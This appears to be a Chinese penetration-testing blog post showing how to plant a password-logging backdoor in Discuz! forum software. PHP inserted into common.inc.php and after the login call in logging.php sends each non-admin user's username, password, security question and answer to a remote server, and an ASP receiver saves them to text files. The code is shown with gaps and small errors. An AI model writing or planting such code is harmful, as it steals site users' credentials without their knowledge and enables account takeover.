http://www.80pentest.com/?p=835
DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php
01 |
function request_by_other( $remote_server , $post_string ){
|
05 |
'header' => 'Content-type: application/x-www-form-urlencoded' . "/r/n" .
|
06 |
'User-Agent : xxbing/'s fuckyou!!!' . "/r/n" .
|
07 |
'Content-length: ' . strlen ( $post_string )+8,
|
08 |
'content' => 'mypost=' . $post_string )
|
10 |
$stream_context = stream_context_create( $context );
|
11 |
$data = file_get_contents ( $remote_server ,FALSE, $stream_context );
|
找到根目录下的 logging.php文件。搜索下面代码。
1 |
$ucresult = uc_user_login( $username , $password , $loginfield == 'uid' );
|
然后在后面插上下面的代码:
1 |
if ( $username != 'admin' ){
|
2 |
$showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600);
|
7 |
$post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ];
|
因为我熟悉asp,所以接受端我用asp写的。
asp代码如下:
03 |
'body0 = request.form( "name1" )
|
04 |
body1 = request.form( "name" )
|
05 |
body2 = request.form( "password" )
|
06 |
body3 = request.form( "questionid" )
|
07 |
body4 = request.form( "answer" )
|
08 |
body5 = request.form( "showtime" )
|
09 |
body7 = request.form( "from" )
|
10 |
body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7
|
12 |
FileName = date ()& ".txt"
|
13 |
'这里之所以要替换,是为了兼容IIS7的环境。 |
14 |
FileName = Replace(FileName, "/" , "-" )
|
16 |
Call CreateFile(body6,FileName) |
18 |
Sub CreateFile(body,FileName) |
20 |
Set fso = CreateObject( "Scripting.FileSystemObject" )
|
21 |
Set tf = fso.openTextFile(server.mappath(FileName),8,True,0) |
23 |
tf.WriteLine "----------------"
|